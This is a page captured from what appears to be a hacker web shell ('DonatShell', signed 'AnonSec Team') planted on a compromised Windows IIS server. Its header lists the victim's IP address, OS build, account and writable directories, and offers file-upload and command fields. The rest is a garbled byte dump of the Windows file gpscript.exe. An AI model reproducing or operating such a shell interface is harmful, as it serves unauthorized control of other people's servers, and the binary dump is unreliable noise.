DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/System32/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/System32//gpscript.exe
MZ@	!L!This program cannot be run in DOS mode.

$,dBdBdBװdBdBѰdBdC:dBưdBְdBӰdBRichdBPEL4W	JqG`@$Pp8!@.textjIJ `.data`N@.rsrcpP@@.relocX@BShSvSSSSSSTT(TBTVWvXXXXXXXY Y:YV\TjTzTTTTTTTTTU,UBUTUpUUUUUUUUNYV&V8VFV\VrVVVVVVVFSdRDRW0W>WHWRWZWjWWWWWWWWWWWXX:XNXhXSRRRRRRRRDOFI4W%!ShutdownLogoffLogonStartupPATH;Volatile EnvironmentExecTimeParametersSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon1SEE_MASK_NOZONECHECKSErrorCodeFileSysPathScriptSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\ShutdownSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\LogoffSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\LogonSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\StartupSoftware\Microsoft\Windows\CurrentVersion\Group Policy\State\bad allocationhpllX,(RegenerateUserEnvironmentshell32.dll%s%s\WindowsPowershell\v1.0\powershell.exe -ExecutionPolicy ByPass -File %s IsPowershell\Scripts\ShellExecuteExW\ScriptsError Opening registry key = %ws, with 0x%xMachine\ScriptsEnableScriptZoneSecurityCheck failedGetScriptsExecutionBehavior failed with status 0x%xNot Executing scriptsDisableScriptZoneSecurityCheck failed with Status = 0x%xUpdateUser failed with %d.GPScript: Incorrect Script type specified/RefreshSystemParam/Shutdown/Startup/Logoff/LogonImmDisableIMEimm32.dllGPSVC(%x.%x) %02d:%02d:%02d:%03d 

Moving log file to backup failed with 0x%xSoftware\Policies\Microsoft\Windows\SystemUserenvDebugLevelGpSvcDebugLevelSoftware\Microsoft\Windows NT\CurrentVersion\Diagnostics;y9999s:<:<
;User SID = <%ws>User SID = MACHINE SIDCreateNestedDirectory:  Received a NULL pointer.CreateNestedDirectory:  Failed to create the directory with error %d.CreateNestedDirectory:  Parsing problemCreateNestedDirectory:  CreateDirectory failed with %d.CreateNestedDirectoryEx:  Failed to copy Directory Name. StringCchCopy failed with 0x%x.HideLogoffScriptsHideLogonScriptsHideShutdownScriptsHideStartupScriptsRunLogonScriptSyncRunStartupScriptSync| T ,  %ws key value is greater than the max size allowedxaaHa!RSDSYTj^Iesgpscript.pdbJNNNV3ʅtf9tFFJuuW^t|+ʉÃ'̋USVW؋33t!9EtftfAACCNMGuuIIOz3fMt9_^[]̋UE=t<=t5=t.=t'=t =t=Pt=`t=t33@]̋VW>ttWuW&_^̋UMtu	@tu`]̋Vhlhp3pul^̋V3Vhppulu3^̋USVu3W;tzU;tsf9tnj_f'uCfutV"VxÍDPj@tujX6f'uj'Zffffu3fM3_^[]̋UVuVx~(f>"u"f|F"u3fLFDPFPV^]̋UVtP|E^]̋UU3tvW|EMhj`]̋UUS3Vt;vW]|W}M_3Ʌ|UEV+jK^[]̋UM3tvW|9SVW}EPuqVW3|;wu
z3fw_^[]̋U,VEPh3Vh,huEPEPEPEPEPEPEPEPVVVuu^950ath0aEPuBEԣ0aEWh4a;thW;tjMQW_M3@^̋UQV5Wjju֋u3?e?Pj@tPM}tWuuօuu|O;uE_^̋UQWWMtqSV5xPuփe؍\Sj@tPMduu36uSVqh(SVE0SVVWpV|3@^[_̋U,a3ʼnEEES]lE VTE$WX3x5tWj@pt|PuDž,Wj@PgtWj@P|M|tV|H=w|ul=VS׋vVSׅul|ptPlt39u(3\`j@VPpPDžDxo;t9|Dž9ut3E@f;tWhxVPt~
oWf;tSVPuVPulh(Phh-P3ۃ;t~
;농\PPlSSSSSPPul_j\xP\txl5h9\t\9`t`;5W|)pVCj<_WjP33Dž@(Af9;ux,xt9t|l09}t4E@4PTl5p9tt
th;t>}t%jPphlhpPh39tjPjjhX=|t׃t׃|t|׃ttt׋M_^3[&$̋Ua3ʼnEEUSVEEWE`3}UuEuuHf@@f;u+MQMQh	PhR;huu;}S4`uu;|VVVVVVVEPVVVu;u9uEPjVjEPuuu =Pu׋;;EPhVEPu׋;VEPWVhuu;VEPWVhluu;EPEPVVhu;tPuMuuuuuuuu;t3tjtPjVhXu9ut	u|9ut	u|M#MEE;E,9ut	u|9ut	u|MM9ut	u|M_^3[̋U0SV3W}uu؉u܉uu9wEPjuPu)l9u}uhuM	EPMMЋ	u9ut}t	uh39wtjM^EPf@@f;u+pF6Pj@tPMw]uj[ShVSy}ShpVS|׋5EPWjuh֋؅EPEWS4`u֋3;tI9
8aqES4`hjPuVS
ShgEPEWQ4`39HR֋3;t98aES4`PPPPPPPMQPPPuE؅hthPEԅu
le}]܍MQ3WPjuEuE PS֋؅uQEPWSuu֋؅u=uԋMuuuuut؍MMEE;ErMMu|}t	u|MMM_^[̋USV3@WEE3;t.98aWhxS98ahHEPEPEP39^P6*;uuuuK,98at$WhSQ98at
hHS;YYXt98at
hSYY_^[jul=8atPhj̋USVW3VVjVuudVjRt%hE;thP;tSЍEPP;}5ShSwjjփu3@PMM?~ShSwjjփuPXShSwjjփu3ShSwjjփujSh|Swjjփu=8ath(jYY}t	utW_^3[̋USVuu3NVW|;wt
z3fwƋMt^[]̋U39Et	}vW|EWu}uj_]̋Ua3ʼnElp8aItIt3Ƀ}3A	3Ƀ}V%|hj@tESW`PnPlPjPhPPPhEj<P&=$tEP׍EPuhuTtuS׃|hj@t3|;VPhp`;;WhjWjj|xtyjWWPt]5xWtPEP֋=PEPxjtPuPuxjtPSPSxxh||u|_[pM3^X̋UPa3ʼnE%8aSV5WPSjhXW։u<Ph8aPjh4DžuRPSjhWօu<Ph8aPjhDžPSjhW3ۅu;Ph8aPSh4Dž98a9]=VPh8`;;SP	VPhp`;tx;wtPSPt[rOVPh`;t<;w8jPPu98atlPh`jM_^3[8̋UMH]̋UAM3]̋UW39GuM3_]V5jPPuPwP^ul̋U39AM3]̋USVu3W9_uEPVjhP ul؁u'3wut
Ph&l_^[]̋UVuW63W$ult
Ph&_^]̋UQyu=8at@hj>YYËURP u#98atuhju|̋UQQS]V33AMu;MQVVjPulz5tWuj@֋t:EPuEWjpu
l=7Pj@E։uj^"7Pu}3
|#tW|_^[̋tP|̋UEVtVY^]jN3}}u>}9ytFURP$|E;u&Vuu	lE9}t;tPӉ>9}tuӋEhjNE3ۍMQΉ]]P}MQP9]t9]ttEn9]ud]]]MQEP$;u(MQP$;uuu,M؉5|9]tu9]tu֋E3
̋U<VW}EP3VEPWluj3;f9Ev]f?\uf\uf?uf\tBEPVVW4;t
=v'EPpud@0Vpth닋EEEf;tEEEuEEȍEE̋EEE@uԉu;t@ESVVh!@jjjVEPEPhEPx؍EPpud@0Vpt;|u|3@/WtuhSP3[_^̋U@a3ʼnESVuW}3ۉ;f9PSVt t
{jlWV9]t8t3@UthVVhP;} 98aPhSsVxGf:uj\Zf9ujjY+ff9f;tOf;uf9Of;f;tOf;uf9lf9u
Of9uI}85lֹ;	f>\t	FFOf>uf>\u~3fPjPuT}Pt*8u7=8alPhj{5thPj\XfFFOtf>[398atShHDh=8at$Phj98at
hPSgYY3M_^3[̋Ujuu]̋UVuhhMVEPuMuu9E^̋UVhhM3
VEPhT uMu9u^̋UVhhM3
VEPh| hM
u9u^̋UQeSVuE]W3G8EtFHt0Ht"Ht	EW\Wh h><WhuuWhu0Wh, h>t
uE E_jWX^[jN53ۉ]E5EPSEPSu]u֋;EMDE;Evjo_98at{uh S0h<Wj@tPMM9]uj_IEPuEPSuEu}֋;uE;tMEM]9]t	u|%(̋UVu3utу;ur^]̡hahXa5daXahHahLahDa,TajXhOp3ۉ]]EPHEEdpdjVWDt;u3Fh@3Fd;u
jY/du 5dhhYYt.5`ad;uhhYYduSW<=dthd	YtjjjdL0u< wLt}uBt
< wFuEtEj
XPVjh,\a=Pau[P@<"u39MMP<YtFuF놋E	MPQYYËeEܣ\a=PauP4=`au0E\a3@ËeE̸MZf9t3M<8PEuHtuՃv39xtv39jPa;PX
d
dYYT
paP
la=(auhJYc3M;
au%%$%(Pd5D$+d$SVW(a3PuEEd̋Md
Y__^[]QWVS3D$}GT$ڃD$T$D$}GT$ڃD$T$uL$D$3؋D$A؋L$T$D$ud$ȋD$r;T$wr;D$vN3ҋOu؃[^_̋UE8csmu+xu%@= t=!t="t=@u\3]hHL3%8̋UMMZf9t3]ËA<8PEu3ҹf9H‹]̋UEH<ASVq3WDv}H;r	X;r
B(;r3_^[]jhOeV\Yt=E+PVYYt+@$ЃE E3=ËeE3e%D%HhJd5D$l$l$+SVWa1E3PeuEEEEdËMd
Y__^[]Q̋UuuuuhGhaL]hhdYY3jhPL3MtDt?!EMZf9u+Q<|$s
E8PEt3@Ëe3EE?̋UjPt$Pt@\fujX]fu3@]ËE]̋UaeeSWN@;t
t	Уa[VEP\u3u33X3EPTE3E3;tauO@5a։5a^_[̋U(xb
tbpblb5hb=dbfbf
bf`bf\bf%Xbf-TbbE|bEbEbabaxa	|aaajLh0!h	P`%`̋UMHMH]̋UQeVuW>EPhjuuu1EPVEPjuEuu
}tj
>X>tM	_^3̋UESVW}F3ۅt
WuPu[FtWuPuE_^[]̋UQEeSVW}Ft
WuPu
Ft
WuPSFtWuPuEuFtWuPSEE_^[̍MQT$BJ38O̍M)M!T$BJ3lO̍MT$BJ3O̡`````$``,`N"0ONN"\ON"OFFBFVFIJ2K6KQxRR<SlQ\SPNTP"W4Q.XShSvSSSSSSTT(TBTVWvXXXXXXXY Y:YV\TjTzTTTTTTTTTU,UBUTUpUUUUUUUUNYV&V8VFV\VrVVVVVVVFSdRDRW0W>WHWRWZWjWWWWWWWWWWWXX:XNXhXSRRRRRRRRUpdatePerUserSystemParameters~GetSystemMetricsUSER32.dllRtlCopySidRtlLengthSidRtlNtStatusToDosErrorRtlIsDosDeviceName_UNtCloseNtCreateFileKRtlFreeHeapWRtlReleaseRelativeNameRtlDosPathNameToRelativeNtPathName_Untdll.dllCommandLineToArgvWSHELL32.dll1RegCloseKeyiRegQueryInfoKeyWbRegOpenKeyExWRegSetValueExWoRegQueryValueExWOpenProcessToken[GetTokenInformationtImpersonateLoggedOnUserOpenThreadTokenSetThreadTokenlConvertSidToStringSidWEqualSidADVAPI32.dllSCloseHandleGetLastErrorZSetEnvironmentVariableWELocalAllocTlstrlenWILocalFreecFreeLibraryDGetProcAddress@LoadLibraryWaCompareFileTimeGetEnvironmentVariableWGetExitCodeProcessWaitForSingleObjectCreateProcessWExpandEnvironmentStringsWOSetCurrentDirectoryWpGetSystemDirectoryWwGetSystemTimeuSetLastErrorGetCurrentProcessGlobalFreeeCompareStringWGetCommandLineWHeapSetInformation+WriteFilehSetFilePointerCreateFileWOutputDebugStringWGetCurrentProcessIdGetCurrentThreadIdGetLocalTime`MoveFileExWGetFileAttributesExWDuplicateHandleGetCurrentThreadcSetFileAttributesWGetFullPathNameWCreateDirectoryWKERNEL32.dll_vsnwprintfmemmovememset3_itow??3@YAXPAX@Zs__CxxFrameHandler3__getmainargs_cexitb_exitj_XcptFilter_ismbbleadexit_acmdln_initterm_amsg_exit__setusermatherr__p__commode__p__fmode__set_app_typemsvcrt.dll7?terminate@@YAXXZY_except_handler4_common'_controlfpInterlockedExchangeSleepInterlockedCompareExchangebGetStartupInfoASetUnhandledExceptionFilterGetModuleHandleAQueryPerformanceCounterGetTickCountyGetSystemTimeAsFileTimeTerminateProcessUnhandledExceptionFilterh%SystemRoot%\Debug\UserMode%SystemRoot%\Debug\UserMode\gpsvc.log%SystemRoot%\Debug\UserMode\gpsvc.bakN@D 8Ph		Xsp<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.GroupPolicy.GPScript"
    type="win32"
/>
<description>Group Policy Script Application</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>

4VS_VERSION_INFO[[?
StringFileInfo040904B0LCompanyNameMicrosoft Corporationh FileDescriptionGroup Policy Script Applicationr)FileVersion6.1.7601.23452 (win7sp1_ldr.160512-0600)2	InternalNamegpscript.LegalCopyright Microsoft Corporation. All rights reserved.B
OriginalFilenameGPSCRIPT.EXEj%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7601.23452DVarFileInfo$Translation	H111166666666666666666<<<<<<<<<< 000000000141t1x12333'3=3C3M333
464X445t555555555556686\66666677<7y78%8/8H8p89b99999#:-:C:V:h:n::-;l;r;;;;;;;;
<o<<<<<=2=d=j=====>V>_>m>{>>>>'?.?8?V??????0D0!0S0f0y0~00000	111'1.1;1o111D2P2_2j2222222333 3N3\3h3n3z333333334/4K4S4k4v445'525}5555556'6C6I6r66666777;7F7O7d777777778
8818>8T8`8f8{8888899'9-9]9o9999:&:0:E:V:_::::::::;9;C;T;x;;;;;;;<<F<`<<='=r=~====\>h>~>>>>>>?6?H?i????@`^0|0000011R1Y11111111262J2{222
3 333C3{33333I4^44444444444445"5,5?5I5N5S5i5n5w5|55555555	66626]6c6m6s6|6666677 7'70767>7D7Q7Y7_777777899999,:8:E:b:::::[;;;;;;;;<<<3<9<?<E<K<Q<X<_<f<m<t<{<<<<<<<<<<<<<<<<==Y={=>>>?
????!?&?+?4?@?`?h?t????????P00 0` 000000 0(000401

Anon7 - 2022
AnonSec Team